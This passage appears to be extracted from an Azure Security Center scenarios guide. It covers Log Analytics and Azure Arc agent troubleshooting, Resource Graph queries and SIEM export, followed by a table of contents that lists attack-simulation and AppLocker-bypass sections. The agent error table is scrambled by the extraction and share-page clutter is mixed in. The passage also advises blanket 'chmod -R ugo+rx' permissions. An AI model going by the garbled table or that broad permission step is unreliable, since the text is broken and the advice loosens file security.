• omsconfig has not picked up the latest custom log configuration from the service.
• Log Analytics agent for Linux user omsagent is unable to access the custom log due to
permissions or not being found. You may see the following errors:
• [DATETIME] [warn]: file not found. Continuing without tailing it.
• [DATETIME] [error]: file not accessible by omsagent.
• Known Issue with Race Condition fixed in Log Analytics agent for Linux version
1.1.0-217
Resolution
1. Verify onboarding to Azure Monitor was successful by checking if the following file
exists: /etc/opt/microsoft/omsagent/<workspace id>/conf/omsadmin.conf. If not, either:
2. Reonboard using the omsadmin.sh command line instructions.
3. Under Advanced Settings in the Azure portal, ensure that the setting Apply the following
configuration to my Linux Servers is enabled.
4. Check that the omsconfig agent can communicate with Azure Monitor by running the
following command sudo su omsagent -c 'python
/opt/microsoft/omsconfig/Scripts/GetDscConfiguration.py'. This command returns the
configuration that agent receives from the service, including Syslog settings, Linux
performance counters, and custom logs. If this command fails, run the following
command sudo su omsagent -c 'python
Page 235
/opt/microsoft/omsconfig/Scripts/PerformRequiredConfigurationChecks.py'. This command
forces the omsconfig agent to talk to Azure Monitor and retrieve the latest configuration.
Background: Instead of the Log Analytics agent for Linux running as a privileged user - root, the
agent runs as the omsagent user. In most cases, explicit permission must be granted to this user
in order for certain files to be read. To grant permission to omsagent user, run the following
commands:
1. Add the omsagent user to specific group sudo usermod -a -G <GROUPNAME>
<USERNAME>
2. Grant universal read access to the required file sudo chmod -R ugo+rx <FILE
DIRECTORY>
There is a known issue with a race condition with the Log Analytics agent for Linux version
earlier than 1.1.0-217. After updating to the latest agent, run the following command to get the
latest version of the output plugin sudo cp
/etc/opt/microsoft/omsagent/sysconf/omsagent.conf /etc/opt/microsoft/omsagent/<workspace
id>/conf/omsagent.conf.
Issue: You are trying to reonboard to a new workspace
When you try to reonboard an agent to a new workspace, the Log Analytics agent configuration
needs to be cleaned up before reonboarding. To clean up old configuration from the agent, run
the shell bundle with --purge
sudo sh ./omsagent-*.universal.x64.sh --purge
Or
sudo sh ./onboard_agent.sh --purge
You can continue reonboard after using the --purge option

Log Analytics agent extension in the Azure portal is marked with a failed state:
Provisioning failed
Probable causes
• Log Analytics agent has been removed from the operating system
• Log Analytics agent service is down, disabled, or not configured
Page 236
Resolution
Perform the following steps to correct the issue.

1. Remove extension from Azure portal.
2. Install the agent following the instructions.
3. Restart the agent by running the following command: sudo
/opt/microsoft/omsagent/bin/service_control restart.
• Wait several minutes and the provisioning state changes to Provisioning
succeeded.
Issue: The Log Analytics agent upgrade on-demand
Probable causes
The Log Analytics agent packages on the host are outdated.

Resolution
Perform the following steps to correct the issue.
1. Check for the latest release on page.

2. Download install script (1.4.2-124 as example version):
wget https://github.com/Microsoft/OMS-Agent-for-Linux/releases/download/OMS
Agent_GA_v1.4.2-124/omsagent-1.4.2-124.universal.x64.sh
3. Upgrade packages by executing sudo sh ./omsagent-*.universal.x64.sh --upgrade.
16.3 Azure Arc

This information on troubleshooting and resolving issues that may occur while attempting to
configure the Azure Arc enabled servers Connected Machine agent for Windows or Linux. Both
the interactive and at-scale installation methods when configuring connection to the service are
included.
Page 237
Agent verbose loging
Before following the troubleshooting steps described later in this article, the minimum
information you need is the verbose log. It contains the output of the azcmagent tool
commands, when the verbose (-v) argument is used. The log files are written
to %ProgramData%\AzureConnectedMachineAgent\Log\azcmagent.log for Windows, and Linux
to /var/opt/azcmagent/log/azcmagent.log.
Windows
The following is an example of the command to enable verbose logging with the Connected
Machine agent for Windows when performing an interactive installation.
& "$env:ProgramFiles\AzureConnectedMachineAgent\azcmagent.exe" connect --resource-grou

p "resourceGroupName" --tenant-id "tenantID" --location "regionName" --subscription-id "subs
criptionID" --verbose
Machine agent for Windows when performing an at-scale installation using a service principal.
& "$env:ProgramFiles\AzureConnectedMachineAgent\azcmagent.exe" connect `

--service-principal-id "{serviceprincipalAppID}" `
--service-principal-secret "{serviceprincipalPassword}" `
--resource-group "{ResourceGroupName}" `
--tenant-id "{tenantID}" `
--location "{resourceLocation}" `
--subscription-id "{subscriptionID}"
--verbose
Linux
Machine agent for Linux when performing an interactive installation.
Note
Page 238
You must have root access permissions on Linux machines to run azcmagent.
Bash
azcmagent connect --resource-group "resourceGroupName" --tenant-id "tenantID" --location "r

egionName" --subscription-id "subscriptionID" --verbose
Machine agent for Linux when performing an at-scale installation using a service principal.
Bash
azcmagent connect \
--service-principal-id "{serviceprincipalAppID}" \
--service-principal-secret "{serviceprincipalPassword}" \
--resource-group "{ResourceGroupName}" \
--tenant-id "{tenantID}" \
--location "{resourceLocation}" \
--subscription-id "{subscriptionID}"
--verbose
Agent connection issues to service
The following table lists some of the known errors and suggestions on how to troubleshoot and
resolve them.
If this GPO is enabled and applies to machines with the Connected Machine agent, it deletes the
user profile associated with the built-in account specified for the himds service. As a result, it
also deletes the authentication certificate used to communicate with the service that is cached in
the local certificate store for 30 days. Before the 30-day limit, an attempt is made to renew the
certificate. To resolve this issue, follow the steps to unregister the machine and then re-register
it with the service running azcmagent connect.
Message Error Probable cause Solutio

n
Page 239
Failed to Error occurred while sending request for Device Cannot Verify
acquire Authorization Code: Post reach login.windo connect
authoriza https://login.windows.net/fb84ce97-b875-4d12- ws.net endpoint ivity to
tion b031-ef5e7edf9c8e/oauth2/devicecode?api- the
token version=1.0: dial tcp 40.126.9.7:443: connect: network endpoin
device is unreachable. t.
flow
Failed to Error occurred while sending request for Device Proxy or firewall Verify
acquire Authorization Code: Post is blocking access connect
authoriza https://login.windows.net/fb84ce97-b875-4d12- to login.windows. ivity to
tion b031-ef5e7edf9c8e/oauth2/devicecode?api- net endpoint. the
token version=1.0: dial tcp 40.126.9.7:443: connect: network endpoin
device is Forbidden. t and it
flow is not
blocked
by a
firewall
or proxy
server.
Failed to Error occurred while sending request for Device Group Policy Verify
acquire Authorization Code: Post Object Computer the
authoriza https://login.windows.net/fb84ce97-b875-4d12- Configuration\ GPO is
tion b031-ef5e7edf9c8e/oauth2/devicecode?api- Administrative enabled
token version=1.0: dial tcp lookup login.windows.net: no Templates\ and
device such host. System\ User targetin
flow Profiles\ Delete g the
user profiles older affected
than a specified machin
number of days e. See
on system footnot
restart is enabled. e 1 for
Page 240
further
details.
Failed to Failed to execute the refresh request. Error = 'Post Proxy or firewall Verify
acquire https://login.windows.net/fb84ce97-b875-4d12- is blocking access connect
authoriza b031-ef5e7edf9c8e/oauth2/token?api-version=1.0: to login.windows. ivity to
tion Forbidden' net endpoint. the
token endpoin
from SPN t and it
is not
blocked
by a
firewall
or proxy
server.
Failed to Invalid client secret is provided Wrong or invalid Verify

acquire service principal the
authoriza secret. service
tion principa
token l secret.
from SPN
Failed to Application with identifier 'xxxxxxxx-xxxx-xxxx-xxxx- Incorrect service Verify

acquire xxxxxxxxxxxx' was not found in the directory principal and/or the
authoriza 'xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx'. This can Tenant ID. service
tion happen if the application has not been installed by principa
token the administrator of the tenant or consented to by l and/or
from SPN any user in the tenant the
tenant
ID.
Get ARM The client 'username@domain.com' with object id Wrong Verify

Resource 'xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx' does not have credentials you or
authorization to perform action the
Page 241
Respons 'Microsoft.HybridCompute/machines/read' over and/or service
e scope '/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx- permissions principa
xxxxxxxxxxxx/resourcegroups/myResourceGroup/pro l is a
viders/Microsoft.HybridCompute/machines/MSJC01' membe
or the scope is invalid. If access was recently granted, r of
please refresh your credentials."}}" Status Code=403 the Azu
re
Connect
ed
Machin
e
Onboar
ding rol
e.
Failed to The subscription is not registered to use namespace Azure resource Register
Azcmage 'Microsoft.HybridCompute' providers are not the reso
ntConne registered. urce
ct ARM provide
resource rs.
Failed to Get Proxy server or Verify

Azcmage https://management.azure.com/subscriptions/xxxxxxx firewall is connect
ntConne x-xxxx-xxxx-xxxx- blocking access ivity to
ct ARM xxxxxxxxxxxx/resourcegroups/myResourceGroup/pro to management.a the
resource viders/Microsoft.HybridCompute/machines/MSJC01? zure.com endpoin endpoin
api-version=2019-03-18-preview: Forbidden t. t and it
is not
blocked
by a
firewall
or proxy
server.
Page 242
Page 243
17 Resource Graph
Overview
Azure Resource Graph is a service in Azure that is designed to extend Azure Resource
Management by providing efficient and performant resource exploration with the ability to
query at scale across all subscriptions and management groups so that you can effectively
govern your environment.
For more details on Azure Resource Graph please visit Resource Graph Overview
Note
You may also refer to https://docs.microsoft.com/en-us/azure/governance/resource-
graph/samples/starter
Explore Resource Graph

1 In the portal, click All Services and search for Resource Graph.
2 Click and run the following queries using Azure CLI:
#Add the Resource Graph extension to the Azure CLI environment
az extension add --name resource-graph
#Check the extension list (note that you may have other extensions installed)
az extension list
#Count Azure resources
az graph query -q "summarize count()"
#List resources sorted by name
az graph query -q "project name, type, location | order by name asc"

#Show all virtual machines ordered by name in descending order
az graph query -q "project name, location, type| where type =~
'Microsoft.Compute/virtualMachines' | order by name desc"
#Show first five virtual machines by name and their OS type
az graph query -q "where type =~ 'Microsoft.Compute/virtualMachines' | project name,
properties.storageProfile.osDisk.osType | top 5 by name desc"
#Count virtual machines by OS type
Page 244
az graph query -q "where type =~ 'Microsoft.Compute/virtualMachines' | summarize
count() by tostring(properties.storageProfile.osDisk.osType)"
#List all public IP addresses
az graph query -q "where type contains 'publicIPAddresses' and properties.ipAddress !=
'' | project properties.ipAddress | limit 100"
#Count resources that have IP addresses configured by subscription
az graph query -q "where type contains 'publicIPAddresses' and properties.ipAddress !=
'' | summarize count () by subscriptionId"
#Virtual machines by location
az graph query -q "where type =~ 'Microsoft.Compute/virtualMachines' | summarize
count() by location"
#Virtual machines by SKU

az graph query -q "where type =~ 'Microsoft.Compute/virtualMachines' and
properties.hardwareProfile.vmSize == 'Standard_B2s' | project name, resourceGroup"
Page 245
FAQ
17.2 How does Azure Security Center relate to Azure Sentinel?
Security Center is one of the many sources of threat protection information that Azure Sentinel
collects data from, to create a view for the entire organization. Microsoft recommends that
customers using Azure use Azure Security Center for threat protection of workloads such as
VMs, SQL, Storage, and IoT, in just a few clicks can connect Azure Security Center to Azure
Sentinel. Once the Security Center data is in Azure Sentinel, customers can combine that data
with other sources like firewalls, users, and devices, for proactive hunting and threat mitigation
with advanced querying and the power of artificial intelligence.
Are there any changes to Security Center as a result of this strategy?
To reduce confusion and simplify the user experience, two of the early SIEM-like features in
Security Center, namely investigation flow in security alerts and custom alerts will be removed in
the near future. Individual alerts remain in Security center, and there are equivalents for both
security alerts and custom alerts in Azure Sentinel.
Going forward, Microsoft will continue to invest in both Azure Security Center and Azure
Sentinel. Azure Security Center will continue to be the unified infrastructure security
management system for cloud security posture management and cloud workload protection.
Azure Sentinel will continue to focus on SIEM.
To learn more about both products, please visit the Azure Sentinel home page
Page 246
17.3 Connect Azure Security Center data to Azure Sentinel
Azure Sentinel enables you to connect alerts from Azure Security Center and stream them into
Azure Sentinel.
Prerequisites
• If you want to export alerts from Azure Security Center, you must be a contributor on the
subscription whose logs you stream.
• You must have the Azure Security Center Standard tier running on the subscription. If
not, upgrade your subscription to standard.
• You must log in with a user that has global administrator or security administrator
permissions on each subscription you want to connect.
Connect to Azure Security Center
1. In Azure Sentinel, select Data connectors and then click the Azure Security Center tile.
2. In the right, click Connect next to each subscription whose alerts you want to stream into
Azure Sentinel. Make sure to upgrade each subscription to Azure Security Center Standard
tier to stream alerts to Azure Sentinel.
3. Click Connect.
4. To use the relevant schema in Log Analytics for the Azure Security Center alerts, search
for SecurityEvent.
Next steps
In this document, you learned how to connect Azure Security Center to Azure Sentinel. To learn
more about Azure Sentinel, see the following articles:
• Learn how to get visibility into your data, and potential threats.
• Get started detecting threats with Azure Sentinel.
Page 247
17.4 Exporting data to a SIEM
Azure Security Center allows you to export data to a SIEM. Processed events produced by Azure
Security Center are published to the Azure Activity log, one of the log types available through
Azure Monitor. Azure Monitor offers a consolidated pipeline for routing any of your monitoring
data into a SIEM tool. This is done by streaming that data to an Event Hub where it can then be
pulled into a partner tool.
This pipe uses the Azure Monitoring single pipeline for getting access to the monitoring data
from your Azure environment. This enables you to easily set up SIEMs and monitoring tools to
consume the data.
The next sections describe how you can configure data to be streamed to an event hub. The
steps assume that you already have Azure Security Center configured in your Azure subscription.
High-level overview
What is the Azure security data exposed to SIEM?
In this version we expose the security alerts. In upcoming releases, we will enrich the data set
with security recommendations.
How to setup the pipeline
Create an Event Hub
Before you begin, you need to create an Event Hubs namespace. This namespace and Event Hub
is the destination for all your monitoring data.
Stream the Azure Activity Log to Event Hubs
Please refer to the following article stream activity log to Event Hubs
Install a partner SIEM connector

Page 248
Routing your monitoring data to an Event Hub with Azure Monitor enables you to easily
integrate with partner SIEM and monitoring tools.
Refer to the following link to see the list of supported SIEMs
Example for Querying data
Here is a couple of Splunk queries that you can use to pull alert data:
Description of Query Query
All Alerts index=main Microsoft.Security/locations/alerts
Summarize count of index=main sourcetype="amal:security" | table operationName | stats

operations by their name count by operationName
Get Alerts info: Time, Name, index=main Microsoft.Security/locations/alerts | table _time,

State, ID, and Subscription properties.eventName, State, properties.operationId,
am_subscriptionId
Page 249
17.5 What are the Log Analytics Agent Timeouts?
If any agent is unable to communicate to the service for any reason, the collected data is stored
locally in a temporary cache and tries to resend the data every 8 minutes for 2 hours. The
agent's cached data is protected by the operating system's credential store. If the service cannot
process the data after 2 hours, the agents will queue the data. If the queue becomes full, OMS
starts dropping data types, starting with performance data. The agent queue limit is a registry
key so you can modify it, if necessary.
Collected data is compressed and sent to the service, bypassing on-premises databases, so it
does not add any load to them. After the collected data is sent, it is removed from the cache.
https://azure.microsoft.com/en-us/documentation/articles/log-analytics-security/
https://docs.microsoft.com/en-us/azure/log-analytics/log-analytics-add-solutions#data-
collection-details
17.6 What can we do with PowerShell?

The Az.Security module Introducing the Azure Az PowerShell module | Microsoft Docs
17.7 What is missing if Log Analytics is not installed?

Security Center collects data from your Azure virtual machines (VMs) and non-Azure computers
to monitor for security vulnerabilities and threats. Data is collected using the Microsoft
Monitoring Agent, which reads various security-related configurations and event logs from the
machine and copies the data to your workspace for analysis. Examples of such data are:
operating system type and version, operating system logs (Windows event logs), running
processes, machine name, IP addresses, and logged in user. The Log Analytics Agent also copies
crash dump files to your workspace.
Data collection is required to provide visibility into missing updates, misconfigured OS

security settings, endpoint protection enablement, and health and threat detections.
Page 250

SecASC - Tactical Scenarios Guide

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

SecASC - Tactical Scenarios Guide

Uploaded by

Copyright:

Available Formats

Security: Azure Security Center

Scenarios and Usage Guide

1 Use Role-Based Access Control to manage access to your Azure subscription

1.2 Roles and Allowed actions ........................................................................................................................ 3

1.3 View access ..................................................................................................................................................... 5

1.4 Add Access ...................................................................................................................................................... 6

1.5 Remove Access .............................................................................................................................................. 7

2.2 Enable Azure Defender ............................................................................................................................ 14

Enable Azure Defender from Pricing & Settings ..................................................... 15

Enable Data Collection ............................................................................................. 17

2.3 Azure Defender Dashboard ................................................................................................................... 24

2.4 Azure Defender for Servers .................................................................................................................... 25

Simulate and detect attacks on Linux ...................................................................... 32

Alerts validation ....................................................................................................... 41

Azure Defender's integrated vulnerability assessment solution ............................. 51

Adaptive Application Control .................................................................................. 54

File Integrity Monitoring .......................................................................................... 63

2.5 Azure Defender for Key Vault ............................................................................................................... 75

Create a new secret in the Key Vault ....................................................................... 77

Respond to Azure Defender for Key Vault alerts .................................................... 80

2.6 Azure Defender for SQL Servers on Machines................................................................................ 82

Explore vulnerability assessment reports ................................................................ 84

Azure Defender for SQL alerts ................................................................................. 87

2.7 Azure Defender Security Alerts Guide ............................................................................................... 87

2.8 Azure Security Center threat intelligence report ........................................................................... 88

3 Connect your non-Azure machines to Security Center ........................................................ 91

Add non-Azure Windows Machines with Getting started ....................................... 96

Add non-Azure Linux Machines with Getting started ........................................... 100

Connecting computers to Log Analytics gateway ................................................. 106

Onboard Windows computers through Windows Administrative Center (WAC) .. 109

Clean up resources ................................................................................................. 113

4 Monitor Security Health ................................................................................................................ 115

4.2 Compute Health and Inventory .......................................................................................................... 119

4.3 Implement Security Recommendations .......................................................................................... 122

4.4 Review and Implement Security Recommendations .................................................................. 123

5 Regulatory Compliance ................................................................................................................. 125

Improve your compliance posture ......................................................................... 128

Explore the Azure Security Center repository ....................................................... 132

6.2 Create a Network Security Group ...................................................................................................... 132

6.4 Create Azure Automation Account and Runbook....................................................................... 135

6.5 Create a Workflow Automation.......................................................................................................... 143

6.6 Bypass AppLocker and Remediate .................................................................................................... 152

6.7 Troubleshooting Runbook ................................................................................................................... 156

7 Secure Score ...................................................................................................................................... 163

How the Secure Score is calculated ....................................................................... 165

Secure score FAQ ................................................................................................... 169

8 Security Policies ................................................................................................................................ 170

Create a custom initiative ...................................................................................... 170

Adding a dynamic compliance package ................................................................ 173

9 Azure Policy ....................................................................................................................................... 175

9.2 How is it different from RBAC? ........................................................................................................... 175

Prevent misconfigurations ..................................................................................... 182

10 Log Analytics ..................................................................................................................................... 187

10.2 Failed logons ............................................................................................................................................. 187

10.3 Computers with most errors................................................................................................................ 187

10.4 Heartbeat missing in the last day ...................................................................................................... 188

10.5 Processor utilization over the last week .......................................................................................... 188

10.6 Query data across workspaces ........................................................................................................... 189

11 Post-Breach Threat Detections ................................................................................................... 190

11.2 Executing the Attack ............................................................................................................................... 192

11.3 Reviewing Security Center Alerts ....................................................................................................... 193

Suspicious Activity Detected ................................................................................. 196